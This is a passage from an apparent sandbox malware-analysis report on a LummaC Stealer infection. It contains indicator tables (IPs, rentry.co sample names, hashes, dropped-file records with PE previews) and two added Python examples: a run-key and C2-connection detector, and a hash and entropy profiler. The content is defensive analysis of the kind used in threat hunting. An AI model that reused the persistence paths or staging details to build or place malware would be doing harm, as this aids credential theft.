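    "2024-11-29T14:46:01Z proxy CONNECT 172.67.170.85:443 client=10.0.0.7",
    "2024-11-29T14:46:30Z dns query example.com A -> 93.184.215.14",
]


def scan(entries=SAMPLE_RUN_ENTRIES, lines=SAMPLE_NET_LOG) -> list[Hit]:
    return check_run_entries(entries) + check_network_log(lines)


if __name__ == "__main__":
    for hit in scan():
        print(f"[{hit.kind}] {hit.reason}\n    {hit.evidence}")
```

On the constructed input the OneDrive value is left alone (it lives under AppData\Local, not Roaming), the NetUtilityApp value fires on its name, the second Roaming entry fires on the path heuristic, and the bare 172.67.170.85 CONNECT is reported as informational only.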
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.2.16 | zkGOUJOnmc.elf | malicious | Unknown | arc-gym.com.cutestat.com/wordpress/wp-login.php
172.67.170.85 | vc9dXDjnki.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
rentry.co | IaslcsMo.ps1 | malicious | LummaC Stealer | 172.67.75.40
rentry.co | IaslcsMo.txt.ps1 | malicious | LummaC Stealer | 172.67.75.40
rentry.co | owuP726k3d.exe | malicious | AsyncRAT, XWorm | 172.67.75.40
rentry.co | gkzHdqfg.ps1 | malicious | LummaC Stealer | 172.67.75.40
rentry.co | xaSPJNbl.ps1 | malicious | LummaC | 172.67.75.40
rentry.co | Exploit Detector.bat | malicious | Unknown | 172.67.75.40
rentry.co | MilwaukeeRivers.exe | malicious | LummaC Stealer | 172.67.75.40
rentry.co | http://www.thearchiterra.gr/ | malicious | Unknown | 104.26.2.16
rentry.co | RobCheat.exe | malicious | Python Stealer, CStealer | 172.67.75.40
rentry.co | Spedizione.vbs | malicious | Unknown | 172.67.75.40
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | http://myhobbybuys.com | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | https://29112024red01kamcjduq.z33.web.core.windows.net | malicious | TechSupportScam | 104.17.25.14
CLOUDFLARENETUS | http://antena1.rtp.pt | malicious | RATDispenser | 104.22.62.150
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.165.166
CLOUDFLARENETUS | https://herald-review.com/users/logout-success/?expire=1626371676&referer_url=http://209.159.152.50 | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://michaelschwab.powerappsportals.com/ | malicious | Unknown | 104.18.3.157
CLOUDFLARENETUS | BASF Hungária Kft.exe | malicious | FormBook | 172.67.186.192
CLOUDFLARENETUS | 'Setup.exe | malicious | LummaC Stealer | 104.21.58.9
CLOUDFLARENETUS | Setup.exe | malicious | LummaC Stealer | 172.67.214.52
CLOUDFLARENETUS | !SET__UP.exe | malicious | LummaC Stealer | 172.67.187.171
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 172.67.170.85, 104.26.2.16
a0e9f5d64349fb13191bc781f81f42e1 | 'Setup.exe | malicious | LummaC Stealer | 172.67.170.85, 104.26.2.16
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC Stealer | 172.67.170.85, 104.26.2.16
a0e9f5d64349fb13191bc781f81f42e1 | !SET__UP.exe | malicious | LummaC Stealer | 172.67.170.85, 104.26.2.16
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim | 172.67.170.85, 104.26.2.16
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 172.67.170.85, 104.26.2.16
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 172.67.170.85, 104.26.2.16
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 172.67.170.85, 104.26.2.16
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 172.67.170.85, 104.26.2.16
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 172.67.170.85, 104.26.2.16
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | CVMrdORGbI.exe | malicious | LummaC |
C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | CVMrdORGbI.exe | malicious | LummaC |
C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | Setup.exe | malicious | LummaC, Amadey, LummaC Stealer |
C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | Setup.exe | malicious | LummaC |
C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | Setup.exe | malicious | LummaC |
C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | setup.exe | malicious | LummaC |
C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | setup.exe | malicious | LummaC |
C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | Setup.exe | malicious | LummaC |
C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | 1st-baba.ps1 | malicious | LummaC |
C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe | Nehogyelinditsd.ps1 | malicious | LummaC Stealer |
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.6599547231656377
Encrypted: false
SSDEEP: 3:NlllulRlltl:NllU
MD5: 2AAC5546A51052C82C51A111418615EB
SHA1: 14CFBEF3B3D238893C68F1BD6FE985DACF1953F1
SHA-256: DBBA7151765EDB3661C0B1AD08037C0BDDC43227D2F2E8DDAC33C4A1E7C4151F
SHA-512: 1273F4B0365E213134E7FBC3BE45CAC33CB32AB6CED85479905C702F0429A0491A5E9C878E5FEFFA05BB0D1AA7F704949D13DD1DA9FCEB93665F1CC110FB24B8
Malicious: false
Preview: @...e...........................................................

Process: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
File Type: data
Category: dropped
Size (bytes): 1331047
Entropy (8bit): 7.4828218306346646
Encrypted: false
SSDEEP: 24576:FMf3uhVRb0kcgNfq2wYoNmHdB65dAv7CE/GCUSqW:FMf3u3cciNmHdB6fAjCEmW
MD5: 01B1592D2B3788C2F82D8BF4C3DD5F65
SHA1: E66B52FF0B3EE73D44F38BAD591FBAEAAF154691
SHA-256: 3E0A43E07A0914EFD7384FA05381931979F1D384F797A6CAE4936F8C08A69FEB
SHA-512: 35B09B9082744376B178AF9A91DB6DAFD8B8220C73D808EDD99B5D76AA9DC6C8A5A9176C07E6D678A6CC5ACA12D950A348675E3FA78400C26DEA11E031DD68A8
Malicious: false
Preview: ..i)..i)..i)..i)..i)/.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..h)..9yO.=h..$@h..Zd..u\..Md..uX..[..$Le.5yy..[j..uX..[...)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H. Gb..Hg..LN.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H.*[n..LB..]j..L..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i).. gO.;.W..Jy..Fm.GgN.5oy..L|..B..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)}.G.%.Y.9.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)
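Each dropped-file record above carries the same five metrics: size, 8-bit Shannon entropy, and the MD5/SHA-1/SHA-256/SHA-512 of the written bytes. The 1331047-byte blob that Setup.exe writes has entropy 7.48 on a file the report can only type as "data", which is the usual signature of a packed or encrypted payload rather than plaintext. The Python below is an added example, not Joe Sandbox's own code, that recomputes those fields for an artifact and checks them against values copied from a report; the 7.0 packed-threshold and the sample inputs are constructed assumptions.

```python
"""Recompute the per-file metrics a sandbox dropped-file record shows
(size, 8-bit entropy, MD5/SHA-1/SHA-256/SHA-512) and verify them offline.
Added example; not Joe Sandbox code."""
import hashlib
import math
from collections import Counter
from pathlib import Path

# Assumption (ours, not the report's): at or above this many bits per byte
# a "data" blob is treated as packed/encrypted and queued for unpacking.
PACKED_ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant stream,
    8.0 when all 256 byte values are equally frequent."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def profile_bytes(data: bytes) -> dict:
    """Return the fields a dropped-file record lists, hex hashes upper-cased
    the way the report prints them."""
    entropy = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": entropy,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        "likely_packed": entropy >= PACKED_ENTROPY_THRESHOLD,
    }


def profile_file(path: str) -> dict:
    """Profile an artifact on disk (e.g. a file recovered from the sandbox)."""
    return profile_bytes(Path(path).read_bytes())


def matches_report(profile: dict, reported: dict) -> list:
    """Compare a computed profile with values copied from a report.
    Returns the names of fields that disagree; an empty list means the
    artifact in hand is the one the report describes."""
    mismatches = []
    for field, expected in reported.items():
        got = profile[field]
        if field == "entropy":
            if not math.isclose(got, float(expected), abs_tol=1e-6):
                mismatches.append(field)
        elif str(got).upper() != str(expected).upper():
            mismatches.append(field)
    return mismatches


if __name__ == "__main__":
    # Constructed sample inputs, not files from the report.
    constant = b"\x00" * 64          # entropy 0.0: a mostly-empty file
    uniform = bytes(range(256)) * 4  # entropy 8.0: encrypted/compressed-looking data
    for name, blob in (("constant", constant), ("uniform", uniform)):
        p = profile_bytes(blob)
        print(f"{name}: size={p['size']} entropy={p['entropy']:.4f} "
              f"packed={p['likely_packed']} sha256={p['sha256']}")
```

To verify a recovered artifact against a record, pass the record's fields to matches_report(profile_file("recovered.bin"), {"size": ..., "md5": ..., "sha256": ...}); SSDEEP is left out because it needs the ssdeep library and is a similarity measure, not an identity check.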
Process: C:\Windows\SysWOW64\msiexec.exe
File Type: HTML document, ASCII text, with very long lines (8793), with no line terminators
Category: dropped
Size (bytes): 8793
Entropy (8bit): 6.157330885734901
Encrypted: false
SSDEEP: 192:PN2x2BjQrUP+/VKg8I+m1FcIavC4KEkfK64FT+hGNyrN:AxWQIP+/VKg8jokvlKEkfz4l+oQN
MD5: 4F96C867367E7A0BE82A59D2E920FEC4
SHA1: 73EB107607EB2D37979400F112BDD144CFD227DC
SHA-256: 6A3C8F51998C6D5379FD3F0A05E76C43E88B8729FBEC9460645944B841750EF1
SHA-512: A9C33174A19A094AB76990288F52B7DB8B14FFF3202F38A5BC4ACEAF9619A5172D2DC809BFD29E0A79FF7C64F945A4C31ABF22E066AC0E087E6A1AA6497015BE
Malicious: true
Preview: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i
The preview is a Cloudflare "Just a moment..." browser-challenge interstitial, so what msiexec.exe fetched and wrote here was a bot-check page rather than the package it requested; these hashes identify that transient response, not a payload.
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\more.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):306688
Entropy (8bit):6.836190455688662
Encrypted:false
SSDEEP:6144:sNGk2wuw1nYaH1SeaRt56699NInzNwsGg2AGf0jx:sck2w/9oeyzJ9NInzysGg2AGf0jx
MD5:8A48C078589AC23005253B28416CBDED
SHA1:582E4F5930F935D04A6D0C5DDCFBFFBFEA745B84
SHA-256:A327EAFC8441768C377971350A15B895D289F8D780593B1FF4BEF217A9822FE6
SHA-512:3BDC14145EC0C2D97CD3E502ADBF23CB71AE7B6FEE2608260985F9E2C4528E609D6E74795035B928FEB07968A44AA2383323DBCE7D40064A527EEA22937A1DAE
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....uS............................0.............@.......................................@..................................................................@...@..................................................4................................text... ........................... ..`.rdata... ......."..................@..@.data...|.... ...\..................@....CRT.........0.......^..............@..@.reloc...@...@...B...`..............@..Bpgo.................................@...........................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):291968
Entropy (8bit):6.618312525566491
Encrypted:false
SSDEEP:6144:PAHdwS/WYoTOLHIsPPzAdnz0YutYPDvhD:PCd9/WYoaLHF3z0z04PDvhD
MD5:7FB44C5BCA4226D8AAB7398E836807A2
SHA1:47128E4F8AFABFDE5037ED0FCABA8752C528FF52
SHA-256:A64EAD73C06470BC5C84CFC231B0723D70D29FEC7D385A268BE2C590DC5EB1EF
SHA-512:F0BD093F054C99BCC50DF4005D0190BD7E3DCEFEA7008AE4C9B67A29E832E02AE9FF39FA75BC1352C127AEB13AFDEA9BFDCC238AC826EF17F288D6FBD2EC8CAB
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: CVMrdORGbI.exe, Detection: malicious, Browse
• Filename: CVMrdORGbI.exe, Detection: malicious, Browse
• Filename: Setup.exe, Detection: malicious, Browse
• Filename: Setup.exe, Detection: malicious, Browse
• Filename: Setup.exe, Detection: malicious, Browse
• Filename: setup.exe, Detection: malicious, Browse
• Filename: setup.exe, Detection: malicious, Browse
• Filename: Setup.exe, Detection: malicious, Browse
• Filename: 1st-baba.ps1, Detection: malicious, Browse
• Filename: Nehogyelinditsd.ps1, Detection: malicious, Browse
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........GY8.&7k.&7k.&7k.M3j.&7k.M4j.&7k.M2j.&7k.^.k.&7k.^2j.&7k.^3j.&7k.^4j.&7k.M6j.&7k.&6k.&7k _3j.&7k _.k.&7k _5j.&7kRich.&7k........PE..d.....d.........."............................@.........................................`.................................................@...d...................L...(......h....w..T...........................@v..@...............P............................text...p........................... ..`.rdata..............................@..@.data....!..........................@....pdata..............................@..@_RDATA..\...........................@..@.rsrc..............................@..@.reloc..h............D..............@..B........................................................................................................................................................................................................
Process:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):653952
Entropy (8bit):6.885961951552677
Encrypted:false
SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
MD5:11D49148A302DE4104DED6A92B78B0ED
SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):14191200
Entropy (8bit):7.9262695020755505
Encrypted:false
SSDEEP:393216:W1pU8xeUOhMFCBURDP4RSLkcswLqLibwonZ14tb:Wr7rCBURqcTXconZ1Ab
MD5:77B8F54C99903633175BF2EE83B93089
SHA1:F8A7C2D280464EA887F95295670D1A3C78146519
SHA-256:09F7868EB0D7629399F54934AE930314358845C9929D973B05F6C1CCA7C67A9E
SHA-512:54D618060571517317F5A6020D79A0E693D499AC865C2A031B5F7AFCCE0EBF75F3610C42F807FEA0FC0B7852F0B119EABE80E317EC7CB181B90B90C202A09BBB
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..^...........!.................E5.......................................w......a9...@..........................B..|....K.x....pw..............j..` ....w.....................................`aw.@...............,............................text...z........................... ..`.rdata...D..........................@..@.data...pC....!.....................@..._COF0.....v..@(..................... ..`_COF1...D...........................@..._COF2....R.......T.................. ..`.rsrc........pw......Z..............@..@.reloc........w......b..............@..B................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
File Type:data
Category:dropped
Size (bytes):9926
Entropy (8bit):6.601683018009094
Encrypted:false
SSDEEP:192:bcCThv4kMUxkMSwJZ8JewGJ6PlKeVsXmWl97ZHaaRbdn2OYvFDE84BRP:vThvYMSwJZ+GJ6PMtWWX16ab29Kb
MD5:0780B1687F4B818A6CCA3CAF57B0D062
SHA1:49B0E39A452F956F640F185CF396D31E8E8E8A39
SHA-256:9E7AEA9FBA017E367B8FD3B188F6AFEF0197F89036FA35420729F19048C6FF2D
SHA-512:8B002C586B73D4AF5A5DAAE512C2B096C4A061BC69AD3750C930D6429FA75C947BD7305A25A9378BEE236C1028914E91B9111A7D735B9D029E2FE7063562CB00
Malicious:false
Preview:..V..`........LyQQ.c..m]....PW.pZRh.`.a..Nv.Y.i.mx.x..R.Vja.y.d.L.u........N...k.Sh.U..V.K.tQ.klyO.jlu..C.a..hgE.od....g\v..PCHu.l..I.R..SB...\xu..A.\B.li.v..Xe.QOxLP....NElW....Eb.BD...Hs..v..TNyK...g..]D^b.v.vDMU.^m..Z..s.U_t.....r.e...l.Z....y...itf.Bg....g....C]qcp_.o..sw.H....j]QXTsjPiL.[w.n^...SrQf.X.d...k^YllAAL.r.nQ...JJbn.N...R..B.Sa..CV.mp.`P....rv.....T..O..kQ...B...sk..H.....i.m.I..aI......w.bJA...Pt...B.g._..ov....v.p.liS..hGIG.gBNZ.xf...ET.f...S.Q.ZS...q..oXn..Ds.q.C..y.wF^A..k...y.....SjV...py._riT..mx.M.g.qe....J...mNuOtS......t.NNeX.u...qQ.g.[kEP..jm.^P..l..G...b.Zr\Dg.MfV..kJ..k.`kyQnw.o.LE............yJ..me.r......Tx..y...U...R...F..r...]ty..BV.......dXO..RA.V...K..S.TK..YIhQmqu\...GGG..X...YEMwx[..I.wg.NjA...kLox..MYg..q..U^M..rr...Y...h.._..Uu.b....K.i..W..]..N...e..e.LB...l..VDW[..E....]g.[q.IwW.`b...F...WVO.Y..xt..`...sd]B..L....s.RLk....r.T._..wB.q.....PG..Bc..s...u.Cf..^b..yD.[.xcc^...NQq..b.....t...Lut.P...j...m..`ms..r.....C...Dm....N..n._psKuIavuTOOmHtJkR..w
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):986746
                                                                                                                                                                                                        Entropy (8bit):7.867918664785953
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:bfMR7mqnsKaQ+RFiZhbvisb4E5aJZNFCPxmO8al:YR7mqn+RFATiF9NFCpms
                                                                                                                                                                                                        MD5:CF297F837262C0FBD5AD028C39A53B62
                                                                                                                                                                                                        SHA1:B6B54C0476C1F4168B829A9A475888BAF3B14012
                                                                                                                                                                                                        SHA-256:4CBDB194C720BC44A5B234FAAA03925EE9566DE6D814D9124DFA6767B41E03CB
                                                                                                                                                                                                        SHA-512:283D2B15A5F317910A5EB5BB74604894E3F36DD907254D98F26C2130A770B552DE6631AFD2D820DE0A9EA069643F19BC86884D719C0F8DFA4B1394FF7880D10B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.R..FV...U_.fQpjF.pSZ..\n....dXO......UZU..L.U.....K..p.....E.t.S...er..L..v.XE..j.ie.TaQS.D.._.yw...o.Q.w.m...SU......gd.\XyQ.....p...R..ux.Ch.E.U.hT.gOi.JqBM..t...qLqe..`......K..HG.[].m....R.w..wFe.....^iMQ.Mbmi......o.C[...y.w..G..HM..UO..y.D..d.Lro.sW......J.Z[..yTY.........y...f.w.iYulDcV.xIm.l.gcQ.F.o.._`R.j.WM....^Rjh.......U.yj.g..K..L.G..]S..]NPV...Oo.L.V......k..gA..p..S..Q.P..H`V.e.T...DwR.....s..K.Yp._f...s.RE..l.n.....PO.sNt.IM.i.....argDt.D.._.......w.B..w.wj...O.....d.C..r.]fp..j..pB......`g......UH.n.FIEM.x\f.Dcyx...l..kX.TWRP..ne.tA..WTM.NFI..OP.i..Kp.W...S...gT.a...RJ..Sar.f....M.D[...YH...`n.p.y.Im.c..TT..d..hiO.Bi.a^.n...KUP.oeJW.JoQspIJET`..`..wS..^.MQ.R.Tpou.d...^P..[oB...B.V.D..tBv....uYDpw.C.S..QN.EX...F.....s......[.e...Uq..h.`.h....T....[.....c.DXj_S..t]...WU..E.Bl.i.l..V....P[..J..^.L.Rx.A..i`..H.]...[.jou......P.eG..VDKh.LLN....Q.g....Yv.iN.fx.ITl.aR..Om..GDm........Rn.jD.qYU....by.XtMErXi.......W.krpNK....\..T..Z....pP.T...sCx..g.t.hvrLZm.F........L...vmN.
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1054613
                                                                                                                                                                                                        Entropy (8bit):4.601238684297783
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:HCH/qJhYLq2SudOFFEpSQjV2SFq3Pxl2ZRN6hhQvb/0nPubFnkFrAt:8FLZGFEnJt6hhQ0PykFY
                                                                                                                                                                                                        MD5:224D05879C6F2B9708EDBB7CF244E76E
                                                                                                                                                                                                        SHA1:5DB1157DDFEFFC4C30650B21F014530470EFE729
                                                                                                                                                                                                        SHA-256:8E58FFD1BA32AB7EAE118F2861ED1449F49A3CD0C459DF2AC26A1FF1BF4D7245
